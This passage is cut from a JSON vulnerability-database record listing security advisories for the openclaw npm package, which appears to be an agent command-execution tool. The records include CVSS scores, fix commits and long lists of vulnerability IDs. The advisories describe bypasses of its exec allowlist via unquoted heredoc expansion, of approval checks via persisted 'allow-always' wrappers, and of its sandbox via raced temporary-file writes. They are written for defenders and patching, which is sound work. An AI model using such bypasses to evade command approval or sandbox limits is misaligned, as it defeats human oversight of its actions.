-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCI
D-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-2rqg-gjgv-84jm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kcba-tshp-77d6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95751?format=json","vulnerability_id":"VCID-kcy2-a98b-uyg7","summary":"OpenClaw's exec allowlist analysis rejects shell expansion in unquoted heredocs\n## Summary\nExec allowlist analysis rejects shell expansion in unquoted heredocs\n\n\n## 
Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nAn allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime.\n\n## Fix\nThe exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text.\n\n## Fix Commit(s)\n- b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx"},{"reference_url":"https://github.com/advisories/GHSA-x3h8-jrgh-p8jx","reference_id":"GHSA-x3h8-jrgh-p8jx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"
cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x3h8-jrgh-p8jx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["GHSA-x3h8-jrgh-p8jx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kcy2-a98b-uyg7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91131?format=json","vulnerability_id":"VCID-kh1q-871c-zkfa","summary":"Duplicate Advisory: OpenClaw's allow-always wrapper persistence could bypass future approvals and enable command execution\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-6j27-pc5c-m8w8. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an authorization bypass vulnerability in allow-always wrapper persistence that allows attackers to bypass approval checks by persisting wrapper-level allowlist entries instead of validating inner executable intent. 
Remote attackers can approve benign wrapped system.run commands and subsequently execute different payloads without approval, enabling remote code execution on gateway and node-host execution flows.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/24c954d972400f508814532dea0e4dcb38418bb0","reference_id":"","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/24c954d972400f508814532dea0e4dcb38418bb0"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allow-always-wrapper-persistence","reference_id":"","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allow-always-wrapper-persistence"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29607","reference_id":"CVE-2026-29607","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI
:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29607"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6j27-pc5c-m8w8","reference_id":"GHSA-6j27-pc5c-m8w8","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6j27-pc5c-m8w8"},{"reference_url":"https://github.com/advisories/GHSA-pfv5-rpcw-x34x","reference_id":"GHSA-pfv5-rpcw-x34x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pfv5-rpcw-x34x"}],"fixed_packages":[],"aliases":["GHSA-pfv5-rpcw-x34x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kh1q-871c-zkfa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91060?format=json","vulnerability_id":"VCID-kh5u-hg46-3qha","summary":"OpenClaw: Sandbox staged writes could escape the verified parent directory before commit\n## Summary\nIn affected versions of `openclaw`, sandbox fs-bridge writes validated the destination before commit, but temporary file creation and population were not pinned to a verified parent directory. 
A raced parent-path alias change could cause the staged temp file to be created outside the intended writable mount before the final guarded replace step.\n\n## Impact\nThis is a sandbox boundary bypass affecting integrity and availability within the writable mount scope. Attacker-controlled bytes could be written outside the intended validated path before the final guarded step ran.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe older staging flow created and wrote the temporary file using target-directory shell path operations before the final replace step revalidated the destination. That meant the last guard protected only the final rename, not the earlier temp-file materialization path.\n\n## Fix\nOpenClaw now resolves a pinned mount root plus relative parent path, creates the temporary file inside the verified parent directory, and performs the final atomic replace from that pinned directory context. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj4p-rc52-m843","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj4p-rc52-m843"},{"reference_url":"https://github.com/advisories/GHSA-mj4p-rc52-m843","reference_id":"GHSA-mj4p-rc52-m843","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mj4p-rc52-m843"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"v
ulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"v
ulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"v
ulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"v
ulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"v
ulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"v
ulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-mj4p-rc52-m843"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http:/